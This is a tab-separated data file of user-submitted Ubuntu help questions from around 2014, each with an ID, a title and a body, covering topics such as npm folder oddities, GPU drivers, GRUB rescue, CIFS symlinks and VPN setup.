416283	strange recursive folder created on npm installation	something very strange is happening to my system . i 'm running ubuntu 12.04 and i use it for node.js deveopment . every time i perform an installation either ( sudo npm install -g mypackage ) a srtange folder is created : [ sudo ] password for emanuele : cointaining a recursive infinite structure : [ sudo ] password for emanuele : /home/emanuele/ [ sudo ] password for emanuele : /home/emanuele/ [ sudo ] password for emanuele : /home/emanuele/ [ sudo ] password for emanuele : /home/emanuele/ [ sudo ] password for emanuele : /home/emanuele/ [ sudo ] password for emanuele : /home/emanuele/ [ sudo ] password for emanuele : and so on ( emanuele is my username , off course ) . i did n't know what caused this . i have n't seen anything like that !
416284	install gpu driver for asus k53sc laptop	i 'm a new ubuntu user . i need to find a driver for the nvidia gpu on my asus k53sc laptop . the system does n't find any additional drivers . when i try to install the graphics driver from the software center , it says that it 's missing some files and displays some internal errors . i also get errors when installing software updates . i tried ubuntu 13.10 and now ubuntu 12.04 , and it 's all failing . i want to stop using windows , but these problems do n't help . which version of ubuntu is more compatible with my system : https : //www.asus.com/notebooks_ultrabooks/k53sc/ # specifications ? my laptop has a 2nd generation core i3 processor . i need step-by-step instructions .
416285	make swap parition from existing ubuntu partition	using ubuntu 12.04 lts , upgraded from 11.10 . had no idea while installing ubuntu for the first time . so missed swap partition . now , at times ubuntu hangs and system monitor shows the memory usage full . is there any method that i can create a partition from the current ubuntu partition and assign it as swap partition ? if yes , kindly guide me to do the same . how much swap partition space is recommended ? current specs - 6 gb ram , 1 gb radeon gpu .
416289	intel nuc dn2820fykh , no sound !	i have ubuntu 13.10 installed on this machine . it is a celeron n2820 processor which is a fairly new chip , just wondering what i should do to troubleshoot this issue ? i have no prior experience with ubuntu and have searched around but i am not sure if it a hardware issue , driver issue or a software issue . any advice would be appreciated . also , if i do a fresh install/downgrade to 12.04 could this possibly solve the issue ? thank you ,
416295	mapping mac os x 's mission control key to ubuntu 's workspaces , with synergy	how can i map my mission control key ( which is alternatively f4 if fn is pressed ) to be my command under ubuntu to show all active workspaces ? when i press that key under ubuntu , in the keyboard - > custom shortcuts option under settings , nothing happens . it 's as if the key being pressed does n't register .
416298	juju + openstack ( devstack ) : error , can not start bootstrap instance , can not run instance	if i want to bootstrap juju with openstack i get the followed output : juju -v bootstrap verbose is deprecated with the current meaning , use show-log 2014-02-04 13:15:13 info juju.environs open.go:156 environment info already exists ; using new not prepare 2014-02-04 13:15:13 info juju.provider.openstack provider.go:116 opening environment `` openstack '' 2014-02-04 13:15:14 info juju.environs.tools tools.go:181 filtering tools by released version 2014-02-04 13:15:14 info juju.environs.tools tools.go:85 reading tools with major.minor version 1.16 2014-02-04 13:15:14 info juju.environs.tools tools.go:96 filtering tools by series : precise 2014-02-04 13:15:14 info juju.environs.boostrap bootstrap.go:50 bootstrapping environment `` openstack '' 2014-02-04 13:15:14 info juju.environs.tools tools.go:181 filtering tools by released version 2014-02-04 13:15:14 info juju.environs.tools tools.go:85 reading tools with major.minor version 1.16 2014-02-04 13:15:14 info juju.environs.tools tools.go:96 filtering tools by series : precise 2014-02-04 13:15:14 info juju.environs.boostrap bootstrap.go:71 environs : picked newest version : 1.16.5 2014-02-04 13:15:15 error juju supercommand.go:282 can not start bootstrap instance : can not run instance : failed to run a server with nova.runserveropts { name : '' juju-openstack-machine-0 '' , flavorid : '' 42 '' , imageid : '' juju-test '' , userdata : [ ] uint8 { 0x1f , 0x8b , 0x8 ... . 0x0 } , securitygroupnames : [ ] nova.securitygroupname { nova.securitygroupname { name : '' juju-openstack '' } , nova.securitygroupname { name : '' juju-openstack-0 '' } } } caused by : request ( http : //xx.xx.xx.xx:8774/v2/a02b07a1a6364b88bc96f305e0ce1ef3/servers ) returned unexpected status : 400 ; error info : { `` badrequest '' : { `` message '' : `` invalid imageref provided . `` , `` code '' : 400 } } on openstack was also no main juju instance created . has someone an idea what goes wrong ?
416299	execute command before shutdown/reboot	i have a machine running a couple of vagrant vm . the problem i have is that sometimes i forget to shutdown those vm before i shutdown or reboot my machine . because of that my machine get stuck with this message : waiting for vboxnet0 to become free i searched about solutions and i found this page : http : //en.kioskea.net/faq/3348-ubuntu-executing-a-script-at-startup-and-shutdown i tried what they for shutdown , but it does n't work . i wrote an sh file for that command : # ! /bin/bash cd ~/workspace/git/mediaservice vagrant halt any suggestions ?
416303	remove dead link in unity dock	i had libre office calc locked to my launcher dock but when i removed libre office the icon stayed on the dock and now i can not remove it . right clicking on it gives me the option `` unlock from launcher '' but when i do that it is still there . according to `` here '' i tried to look for the .desktop file but can not find one for libre office anywhere . suggestions as to how to remove it ?
416304	is there a way to clear the terminal screen during a running process ?	for example , i 'm running tail -f somelogfile . my screen has gotten full to the point that only the last line is changing . i now want to clear the screen ; but the usual ctrl+l does n't work , just shows me the output ^l .
416309	start mysql on startup	i installed mysql , and changed the configuration so the databases are stored on a separate hard drive . in the process mysql has stopped starting up automatically . when i start the computer , i need to run the command : sudo service mysql start to get mysql to run . how do you get mysql to start on boot ?
416313	errors were encountered while processing : hspa-modem-dkms	i get this error whenever i try installing something errors were encountered while processing : hspa-modem-dkms e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and the installation stops abnormally . please someone help me . how to fix this error ? thank you .
416314	how to fix problem playing youtube videos in firefox ?	i am using firefox as my browser and when i am using youtube and play any video on it . not the video and audio they both are not coming continuously . they are coming with an interval . its like the audio is stuck somewhere . i think maybe its my flash player plugin .
416317	screen timout does n't happen when connected to an rdp session via xfreerdp	a very surprising thing i 've found in 13.10 is that if i leave my desktop running with an xfreerdp session running in the ubuntu desktop , when i return after my screen should have timed out , it has n't . if i then access the rdp window without activating the ubuntu desktop directly ( i.e . i just click into the xfreerdp window ) , i can work freely . if however i then select the ubuntu desktop ( i.e . want to run the browser etc ) at some time later , my screen will then timeout and request a log-in . has anyone experienced this at all and if so any ideas on how to fix it ?
416320	number of ubuntu and linux users ?	does anyone know what the latest estimate of active ubutuntu and linux users ?
416322	/usr/share/icons deleted	i have accidentally deleted all the files in my /usr/share/icons directory by using a wrong command . do you know a solution to restore the files ?
416324	lubuntu 13.10 missing try without installation option	i just created a lubuntu 13.10 livedvd via unetbootin on my ubuntu 13.04 system , in order to be able to use lubuntu on an old work computer that runs slowly on windows xp ( a dell optiplex gox 270 , in case that makes a difference ) . i 've gotten to the boot menu and my options are to install lubuntu ( which i 'm not authorized to do ) , check disc for defects , test memory , boot from first hard disk , and rescue a broken system . should i be using one of those options , or might i be missing something that ought to be there ? i can not use a liveusb . i tried , but the computer does n't recognize the usb as an option for booting up . it 's a pretty old computer -- it has a 3.5 '' floppy drive , which is actually what i 'm using so that i can up-convert our old files .
416327	install network printer manually ( router : tp-link tl-wr842nd )	router model no . : tl-wr842nd after reading this article , i carry on the installation but it does not work . this is the properties page : i have attempted to print test page but the status shows me `` processing - not connected ? '' . the following is the screenshot . if i just directly use the wire to connect the printer , it works . [ usb : //fuji % 20xerox/docuprint % 20p205 % 20b ? serial=wkk-850460 ] i have also tried : http : //192.168.0.1/ lpd : //192.168.0.1/lp1 socket : //192.168.0.1/ http : //192.168.0.1/fuji % 20xerox/docuprint % 20p205 % 20b ? serial=wkk-850460/ https : //192.168.0.1/ ipp14 : //192.168.0.1:631/lp1 no one works . this is the status of my router . could you teach me how to configure the setting ? thank you for your attention . update : printer server : online usb connected power on it works well on windows with this official program .
416328	wireless not working on dell latiude 3330 ubuntu preinstalled	i just bought a dell latitude 3330 with ubuntu 12.04 pre-installed . wireless worked without a problem for a few days and then stopped . the wireless broadcom is bcm4352 . tried everything but still not working . works with wire and reliance datacard . please help resolve this issue . thanks . suparna
416331	increase size /opt	i 'm trying to install ibm ds storage manager 10 on an ubuntu 12.04 but it seems i does n't have enough opt space . below is the screenshot from the required/available disk space : is it even possible to resize the /opt ? i always thought that a folder could be as big as the amount of free space you have . i have more than enough space on my hard drive ( about 190gb ) so that should n't be a problem .
416334	symbolic link permission denied , shared folder over cifs	i have synology rack , and im using one folder from my ubuntu 12.04. but i wont be able to create a symbolic link on mounted folder , getting permission denied error , below is my fstab entry # //1.1.1.11/sologs /nsm cifs uid=1001 , gid=1001 , username=admin , password=123456 , iocharset=utf8 , sec=ntlm 0 0 i tried , sudo ln -s /test /nsm error , ln : failed to create symbolic link `/nsm/test ' : permission denied
416337	how to install two different compilers ?	i am an unskilled ubuntu user and almost each time i try to install something nontrivial i break something miserably . i am successfully using gcc 4.7 and 4.8 simultaneously using update-alternatives according to this answer . now i would like to try out clang for my c++ development . i am afraid that the complier is a critical part of the operating system and installing it is nontrivial . i am afraid that if install clang it will overwrite the c++ standard headers and libraries of gcc and/or break something else . how can i safely install and use clang and gcc ? edit : i do not have aptitude installed , so i tried : sudo apt-get install clang-3.4 instead and everything looks fine . i tested gcc and it seems that i did not break it . then i tried to compile something with clang and i got this error : /usr/include/c++/4.8/iostream:38 : error : 'bits/c++config.h ' file not found # include < bits/c++config.h > ^ it seems that clang is trying to use the gcc standard library . how can i solve this ?
416339	trouble with `nvidia-prime` on asus n550jv	i have recently upgraded my asus n550jv notebook from raring to saucy and in the beginning , simply installing nvidia-319 together with nvidia-prime worked fanstastically ( as described here ) . shortly after the upgrade completed , i updated all my software sources and did a dist-upgrade , which somehow broke nvidia-prime . i have tried reinstalling it and installing a newer version of it . nothing worked . this is the relevant extract of my /var/log/xorg.0.log : [ 7.636 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 7.636 ] ( ii ) nvidia glx module 331.38 wed jan 8 19:10:17 pst 2014 [ 7.641 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 7.643 ] ( ii ) nvidia dlloader x driver 331.38 wed jan 8 18:51:00 pst 2014 [ 7.643 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 7.647 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section [ 7.647 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 7.647 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 7.647 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 7.647 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 7.647 ] ( ** ) nvidia ( 0 ) : option `` usedisplaydevice '' `` none '' [ 7.647 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 7.647 ] ( ** ) nvidia ( 0 ) : option `` usedisplaydevice '' set to `` none '' ; enabling noscanout [ 7.647 ] ( ** ) nvidia ( 0 ) : mode [ 8.727 ] ( ii ) nvidia ( gpu-0 ) : found drm driver nvidia-drm ( 20130102 ) [ 8.728 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gt 750m ( gk107 ) at pci:1:0:0 ( gpu-0 ) [ 8.728 ] ( -- ) nvidia ( 0 ) : memory : 4194304 kbytes [ 8.728 ] ( -- ) nvidia ( 0 ) : videobios : 80.07.9a.00.4b [ 8.728 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 8.728 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 750m at pci:1:0:0 [ 8.728 ] ( -- ) nvidia ( 0 ) : none [ 8.728 ] ( ii ) nvidia ( 0 ) : validated metamodes : [ 8.728 ] ( ii ) nvidia ( 0 ) : `` null '' [ 8.728 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 640 x 480 [ 8.728 ] ( ww ) nvidia ( 0 ) : unable to get display device for dpi computation . [ 8.728 ] ( == ) nvidia ( 0 ) : dpi set to ( 75 , 75 ) ; computed from built-in default [ 9.824 ] ( ii ) nvidia : using 3072.00 mb of virtual memory for indirect memory [ 9.824 ] ( ii ) nvidia : access . [ 9.829 ] ( ii ) nvidia ( 0 ) : setting mode `` null '' [ 9.829 ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . [ 9.829 ] ( ee ) nvidia ( 0 ) : failed to complete mode change [ 9.838 ] ( ii ) nvidia ( 0 ) : built-in logo is bigger than the screen . [ 9.842 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 9.842 ] ( == ) nvidia ( 0 ) : backing store disabled [ 9.842 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 9.842 ] ( == ) nvidia ( 0 ) : dpms enabled [ 9.842 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 9.842 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia and this is the /etc/x11/xorg.conf file that nvidia-prime generated on my machine : # warning : this file is autogenerated by nvidia-prime . all changes to this file will be lost . section `` serverlayout '' identifier `` layout '' screen 0 `` nvidia '' inactive `` intel '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` 1:0:0 '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' # the internal display might not be connected # to the nvidia card but we definitely want # to be able to connect external displays later # option `` allowemptyinitialconfiguration '' `` on '' option `` usedisplaydevice '' `` none '' endsection section `` device '' identifier `` intel '' driver `` modesetting '' endsection section `` screen '' identifier `` intel '' device `` intel '' endsection how can i solve this error ?
416342	how to export aufs as nfs	i have mounted folders from multiple drives using aufs . however i ca n't seem to figure out how to export it using nfs . google suggests i have to enable config_aufs_export and use the fsid in the nfs export , but i 'm still lost as to how to do it all . edit : i 've added fsid=0 to the export line in /etc/exports , and i 'm using nsf4 . showmount -e server displays the aufs export is visible to the client and is identical to normal non aufs exports . when i sudo mount server : /folder /mount/pointor add it to /etc/fstab , i get server reports error directory not found . edit2 : i 've found a work around ; i set up nfs and aufs on the server , however i only export the physical drives not the virtual aufs , then on the client i set up the aufs again . not ideal , as i need to have a lot of nfs exports , 5 folders exported separately on 4 drives . and then i need to manually mount aufs every time .
416346	is my sd card broken ?	the sd card from my camera was always hard to mount . i had to put it in and out several times before it would mount . at first i thought that this is a problem in my card reader . then i could not mount it at all . i would get just esoteric error messages and i could not access the contents using a file manager . this was strange , since if i put the card back in the camera i could view the photos on the camera as well as take new photos . i rescued all my photos using photorec and i decided to reformat the card using gparted . i selected a fat32 filesystem , started the formatting and i got an error , which i logged : ======================================== gparted details gparted 0.16.1 -- enable-libparted-dmraid libparted 2.3 < b > format /dev/mmcblk0p1 as fat32 < /b > 00:00:01 ( error ) calibrate /dev/mmcblk0p1 00:00:00 ( success ) path : /dev/mmcblk0p1 start : 2048 end : 7987199 size : 7985152 ( 3.81 gib ) clear old file system signatures in /dev/mmcblk0p1 ( success ) clear primary signatures 00:00:00 ( success ) wrote 68.00 kib of zeros at byte offset 0 clear secondary signatures 00:00:00 ( success ) wrote 4.00 kib of zeros at byte offset 4088393728 flush operating system cache of /dev/mmcblk0 00:00:00 ( success ) set partition type on /dev/mmcblk0p1 00:00:01 ( success ) new partition type : fat32 create new fat32 file system 00:00:00 ( error ) mkdosfs -f32 -v -i -n /dev/mmcblk0p1 mkdosfs 3.0.16 ( 01 mar 2013 ) mkdosfs : unable to open /dev/mmcblk0p1 : device or resource busy ======================================== now when i insert my card nothing happens . not even an error message . is my sd card long gone ? what went wrong ? edit : after formatting ( using my camera ) and re-inserting the card i ran dmesg and here are a few lines from the bottom : [ 9777.377330 ] mmcblk0 : p1 [ 10049.984038 ] mce : [ hardware error ] : machine check events logged [ 10282.680109 ] mmc0 : card 0007 removed [ 10346.160192 ] mmc0 : new high speed sdhc card at address 0007 [ 10346.163745 ] mmcblk0 : mmc0:0007 sd04g 3.80 gib [ 10346.167747 ] mmcblk0 : p1 [ 10348.052488 ] systemd-hostnamed [ 19433 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 10383.396698 ] mmc0 : card 0007 removed [ 10385.900029 ] mmc0 : new high speed sdhc card at address 0007 [ 10385.903012 ] mmcblk0 : mmc0:0007 sd04g 3.80 gib [ 10385.906705 ] mmcblk0 : p1 [ 12013.322686 ] error @ wl_cfg80211_get_station : wrong mac address [ 12013.322774 ] error @ wl_cfg80211_get_station : wrong mac address
416347	how to install global menu in gnome 3	how can i install gnome2 global menu ? this one ( from google ) and not the one we taking here . thanks .
416348	how do i delete password in bugtraq 2 ?	i use system bugtraq 2 and i am the root . when i want to open the tools it asks me for the password . i want to delete or disable the password , what do i do ?
416349	instalation ubuntustudiu 13.10 persistent error	can anyone help ? i am struggling with installing ubuntustudio 13.10 on an older machine with via p5vd2-vm/s motherboard ( pci ) . i succeeded once , but the system kept crashing ; all other installations end with a message device reportred invalid ch5 sector 0 . i know from the fora that this also happens to some guys while using multimedia on otherwise successfully installed systems ... can it be solved by some special installation options ? i do not want to change much in bios settings , do n't want to lose my win7 partition with lots of stuff i must keep for professional reasons ... i hope you know the answer : ) best , tomasz
416352	raptor tool-ubuntu version	can someone please help me download raptor flowchart tool for saucy salamander via terminal ? ( if this is repeated , i 'm sorry )
416353	where is `vino-preferences` gone in xubuntu 13.10 ? ( sharing desktop in xubuntu 13.10 )	i just switched from gnome to xubuntu ( adding the xubuntu-desktop to my laptop ) because i decided that with an atom processor and 2g of ram the full gnome shell experience is a bit , well , slow . all is ok but for the remote desktop sharing . i can activate vino-server correctly following these instructions ( or similar -- - there was the entry in the session manager already ) , so far so good . the problem is that vino-preferences has been removed from the vino package ( 1 ) -- - see this bug report for more info . it says ( in spanish ) that now the vino preferences have to be set from the `` sharing- > desktop sharing '' in gnome-control-center . i have the gnome-user-share package installed . but under xubuntu running gnome-control-center gives just a minimal thing ( correctly , i think ) , and i can not find any way to reach the preferences settings of vino . by the way , the server works ( i am connected with it now ) , thanks to the fact that i had the preferences set up from the previous gnome desktop session ... but how can i access them in xubuntu ? ( 1 ) see : ( 1 ) asus-romano : ~ % dpkg -l vino | grep pref ( 1 ) asus-romano : ~ % although : ( 1 ) asus-romano : ~ % apt-file search vino-preferences app-install-data : /usr/share/app-install/desktop/vino : vino-preferences.desktop vino : /usr/bin/vino-preferences vino : /usr/share/applications/vino-preferences.desktop vino : /usr/share/vino/vino-preferences.ui ... probably referred to some older package .
416355	problem with a hard disk partition	today when i opened up my laptop , my network status indicator was missing . also my fan has started running at full speed for about 5 mins at regular intervals even when laptop is idle . thinking there may be some problem with hard disk , i opened disk utility which showed that /dev/sda4 ( 8.3 gb with no usage so far ) with usage being shown as 'container for logical partitions ' as problematic . it shows that the partition is misaligned by 1024 bytes and suggests repartitioning . will it be safe to do what is suggested by utility ? and how do i get my network status indicator back ?
416357	usb drive - space missing after failed attempt to make it bootable	i was trying to make my usb drive bootable to install arch ( i used dd to write arch iso to the usb drive ) but the process was stopped half-way . the drive stopped responding so i tried sudo dd if=/dev/zero of=/dev/sdb bs=512 count=1 and it did work , in a way , now i get only 2gb ( its of total 4gb ) . before writing arch 's iso , the drive was mbr , but after the failed attempt gparted said that it thinks its gpt . i recreated the partition table choosing msdos in menu ( is it same as mbr ? ) and choose ext2 file system . now it works on ubuntu but get this when i unmount it : error ejecting /dev/sdb : command-line `eject `` /dev/sdb '' ' exited with non-zero exit status 1 : eject : tried to use `/dev/sdb ' as device name but it is no block device eject : tried to use `.//dev/sdb ' as device name but it is no block device eject : unable to find or open device for : `/dev/sdb ' something like this is also happening to my external hdd ( i keep messing up , i know ! ) . it also says 2gb . i think dd messed it up . how can i get the lost space back ? i would like a general approach to change partiton to mbr and and reformat my drive ( usb and ext hdd ) completely . no data on any of usb drives is important .
416358	chromium browser scrolling slow	i just switched from win7 to ubuntu ( no dual boot ) and one thing i kinda ''miss '' is that i can change the scrolling speed ... but i like the scrollspeed in the system itself but do n't in chromium browser . i do n't wan na use firefox because my laptop gets to hot using it . i already tried using the smouthscroll extension but it did n't work . i 'm on ubuntu 13.10 and have a dell mouse : )
416359	how to resolve error : file '/grub/i386-pc/normal.mod ' not found . grub rescue ?	how do i resolve this error : file '/grub/i386-pc/normal.mod ' not found . grub rescue > i do n't know in which partition my ubuntu is installed and i have windows installed too in my system . i have tried set root= ( hd0,6 ) set prefix= ( hd0,6 ) /boot/grub insmod normal normal but the above is also not working . please help ?
416361	ubuntu13.10 does n't detect swiss-french keyboard layout	ubuntu13.10 does n't detect swiss-french keyboard layout , which is of qwertz type . it only detects french-type ( qwerty ) keyboards . swiss-french keyboard layout was still available with ubuntu 13.04 and earlier ( though it was wrongly assimilated to swiss-german layout ) . why was this option removed ? can it be restored ? thanks for your help .
416362	boot failure ubuntu 12.04	i 'm running ubuntu 12.04 and everything was working perfectly until today . i got the following error while booting my system : * starting load fallback graphics devices [ fail ] and after a few lines with the [ ok ] status , i got the following lines and my system did n't even boot . [ 34.00 ... .. ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) [ 64.00 ... .. ] error @ wl_cfg80211_scan : wlc_scan error ( -22 ) and i keep getting similar lines without anything happening . any help to resolve this issue would be highly appreciated .
416364	accessing main settings via/in lowgraphicsmode	in advance i must say im from europe so if and when my english is unclear to you please ask me to rephrase and do accept my apologies in advance . with regards to my question/problem . i have a ibm laptop ( rather old ) running on xubuntu , and i encountered the following my two launchbars disappeared.. then i tried to find a solution , by playing with the resolution & refresh rate.. because i thought maybe they just did n't fit in the frame . ( stupid me ) but then it happened ( god knows what ! ! ) my screen was gone , i rebooted many times , tried the recovery mode every thing i thought would fix it but helas.. now ( at this very moment ) i 'm writing this on the lowgraphicsmode.. the only mode i can put on and my screen works ( but with low graphs ofcourse ) so my question to you is can i change the main settings ( resolution/ refreshrate ) via/in lowgraphmode ? ? and if so how ? ? ? ( please be so kind to be as specific as can be ) i 'm stuck with this problem , with no money to get someone else to fix it ... thanks
416366	using ubuntu 13.10 live usb `` an operating system not found '' error	i have a dell that is a few years old , trying to install ubuntu on it just for something new to try . the computer currently has windows 7 , which will boot and run fine , but i 'd like to wipe the whole thing and just use ubuntu . i have created a live usb , and i know it works because i can actually run ubuntu off the usb on my other laptop . when i try to run it on my dell , however , all that comes up is `` an operating system was n't found . try disconnecting any drives that do n't contain an operating system . '' i am a complete newbie to this , so i have no idea what is wrong . any help would be greatly appreciated .
416367	unable to mount external 80 gb hard disk	i 'm using ubuntu gnome 13.10 and i 'm unable to mount my external hd . it 's an 80 gb drive with only one fat32 partition . the hard disk is working normally if it is plugged directly to the bus ide on the motherboard . below there are some outputs captured after plugging the usb cable of the hard disk . lsusb bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 002 : id 04f3:0232 elan microelectronics corp . mouse bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0408:03ba quanta computer , inc. **bus 001 device 010 : id 04b4:6830 cypress semiconductor corp. cy7c68300a ez-usb at2 usb 2.0 to ata/atapi** bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 03f0:171d hewlett-packard bluetooth 2.0 interface [ broadcom bcm2045 ] bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub ls /dev/sd* /dev/sda /dev/sda1 /dev/sda2 /dev/sda3 /dev/sda4 **/dev/sdb** dmesg [ 12080.416090 ] read ( 10 ) : 28 00 00 00 00 06 00 00 01 00 [ 12080.424118 ] sd 12:0:0:0 : [ sdb ] device not ready [ 12080.424138 ] sd 12:0:0:0 : [ sdb ] [ 12080.424146 ] result : hostbyte=did_ok driverbyte=driver_sense [ 12080.424155 ] sd 12:0:0:0 : [ sdb ] [ 12080.424162 ] sense key : not ready [ current ] [ 12080.424175 ] sd 12:0:0:0 : [ sdb ] [ 12080.424187 ] add . sense : medium not present [ 12080.424197 ] sd 12:0:0:0 : [ sdb ] cdb : after a while dmesg show me some more errors . thank you for helping me .
416370	i get the following errors when i try to install the ubuntu sdk ( ubuntu app development kit )	i use ubuntu 12.04 . i followed the steps given here . 1 ) when i try to execute the first step `` sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get dist- `` '' i got an error 2 ) when i try to execute the second step `` upgrade & & sudo apt-get install ubuntu-sdk `` '' i got an error
416371	uninstall old fedora os and install ubuntu along side win 7	i have installed fedora alongside win 7 ultimate 64 bit . i have decided to uninstall the fedora and i want to use ubuntu instead . i wish to keep win 7 and its data ( ntfs drives ) . please guide me how to do so . my main concern is to uninstall and existing linux os without rupturing the windows os .
416372	boot failure erased my original hard disk and now wo n't launch safe mode	i tried launching linux last night from a dvd on my windows 7 acer aspire . i followed the windows installer and had success getting to the desktop . to proceed it offered me to remove windows 7 so i clicked okay , next the disk ejects , i put it back in , and it says error , so i click cancel . the computer freezes so i restart it and 2 things can happen . 1 ) i push f2 right away and it takes me to insydeh20 setup utility . it does n't read that there is a dvd in for me to boot from . 2 ) i do nothing and the computer reads nothing , stuck in a blank black screen with the single blinking _ . how do i get ubuntu to launch here or at least launch in safe mode ? cheers , -felipe
416374	high cpu use from init and yes [ ubuntu 12.04 ]	today , i installed a fresh ubuntu 12.04 lts on my sony vaio vpcsb . i noticed a high cpu use of init and yes ( as you can see below ) . top - 16:26:16 up 11 min , 2 users , load average : 2.71 , 2.86 , 1.82 tasks : 183 total , 7 running , 176 sleeping , 0 stopped , 0 zombie cpu ( s ) : 5.1 % us , 33.4 % sy , 0.0 % ni , 61.1 % id , 0.3 % wa , 0.0 % hi , 0.1 % si , 0.0 % st mem : 3962180k total , 1771012k used , 2191168k free , 47420k buffers swap : 4107260k total , 0k used , 4107260k free , 1028536k cached pid user pr ni virt res shr s % cpu % mem time+ command 1 root 20 0 24604 2528 1352 r 58 0.1 6:15.32 init 1197 root 20 0 4316 348 272 r 49 0.0 5:20.69 yes 60 root 20 0 0 0 0 s 22 0.0 1:24.63 kworker/2:1 2429 root 20 0 0 0 0 r 15 0.0 1:15.54 kworker/0:0 39 root 20 0 0 0 0 r 9 0.0 1:18.98 kworker/1:1 1845 root 20 0 0 0 0 s 6 0.0 0:40.58 kworker/3:2 1162 root 20 0 339m 106m 81m r 2 2.8 0:29.62 xorg 1962 ingo 20 0 1116m 103m 59m s 2 2.7 0:11.16 compiz 1995 ingo 20 0 495m 16m 11m s 1 0.4 0:00.18 nm-applet is there a solution ? greetings edit : i took a closer look at the kworker i found this why does kworker cpu usage get so high ? $ grep . -r /sys/firmware/acpi/interrupts/ /sys/firmware/acpi/interrupts/sci : 729 /sys/firmware/acpi/interrupts/error : 0 /sys/firmware/acpi/interrupts/gpe0a : 0 invalid /sys/firmware/acpi/interrupts/gpe17 : 729 enabled /sys/firmware/acpi/interrupts/sci_not : 0 /sys/firmware/acpi/interrupts/ff_pmtimer : 0 invalid /sys/firmware/acpi/interrupts/ff_rt_clk : 0 disabled /sys/firmware/acpi/interrupts/gpe_all : 729 /sys/firmware/acpi/interrupts/ff_gbl_lock : 0 disabled /sys/firmware/acpi/interrupts/ff_pwr_btn : 0 invalid /sys/firmware/acpi/interrupts/ff_slp_btn : 0 invalid i am not sure if it is the kworker bug , still missing is the starting point of yes . any suggestions how i could find it ? now i tried to set up ubuntu 12.04 fresh , and got a error message on the first start package : fglrx-pxpress0.6~hybrid0.0.1 i really have no idea how to fix this , and excuse me , if i am missing something important here , just started with ubuntu . picture from system monitor with yes process $ lsof -p 1182 command pid user fd type device size/off node name yes 1182 root cwd unknown /proc/1182/cwd ( readlink : permission denied ) yes 1182 root rtd unknown /proc/1182/root ( readlink : permission denied ) yes 1182 root txt unknown /proc/1182/exe ( readlink : permission denied ) yes 1182 root nofd /proc/1182/fd ( opendir : permission denied ) the try out ubuntu works fine , i have no clue how to fix this . and it is n't possible to end/kill the yes process with the system monitor . sudo lsof -p 1182 lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/ingo/.gvfs output information may be incomplete . command pid user fd type device size/off node name yes 1182 root cwd dir 8,1 4096 2 / yes 1182 root rtd dir 8,1 4096 2 / yes 1182 root txt reg 8,1 22912 2622732 /usr/bin/yes yes 1182 root mem reg 8,1 1815224 17301515 /lib/x86_64-linux-gnu/libc-2.15.so yes 1182 root mem reg 8,1 149280 17301627 /lib/x86_64-linux-gnu/ld-2.15.so yes 1182 root 0u chr 1,3 0t0 1029 /dev/null yes 1182 root 1u chr 136,19 0t0 22 /dev/pts/19 yes 1182 root 2u chr 136,19 0t0 22 /dev/pts/19
416379	keep track of all logins and logouts	the system is using wtmp to keep track of all logins and logouts to the system . since the new year , it does n't keep track for more than a day . for example when i look at all logins i see the following : $ last -i myuser pts/1 xx.x.xx.xx tue feb 4 11:25 still logged in wtmp begins tue feb 4 11:25:49 2014 but i want to see all logins for a much larger time than that , like how it worked before the new year . how can i go about doing that ?
416380	how to create a duplicate of /dev/video0 ?	i have 1 webcam connected to my computer but i want to use it in multiple programs . the problem is when i launch a second program , it tells me the webcam is already used . the programs which will use the webcam are : motion , pam_face_authentification , and some communication software like skype , google hangout ... how can i duplicate the flow of my webcam to simulate a second webcam ?
416382	can not connect after upgrade from ubuntu 13.04 to 13.10	i upgraded to 13.10 and now i have no internet connection . when i do ifconfig , it shows my inet addr : 127.0.0.1 . when i do sudo lshw -c network , it shows *-network disabled , even though the enable networking is checked . how do i repair this ?
416383	disable start-up applications	i followed this tutorial on youtube to disable start-up applications in ubuntu sever 13.10 . what happened is all unchecked apps are being checked again when i close then open the box ! what should i do to keep them unchecked ?
416384	l2tp/ipsec vpn configuration for ubuntu 13.10 desktop	my first question here , and i hope someone can help me out . i manage an astaro/sophos asg220 utm9 fw 9.106-17 , and i have an l2tp\ipsec vpn object configured using a pre-shared key for authentication . this works fine for windows computers , but i need a solution for ubuntu desktop 13.10 . could someone , who has been through this issue with success , please tell me which packages i would need to install on the ubuntu client and how to configure any conf files involved , so i can connect successfully ? thanks in advance for your help .
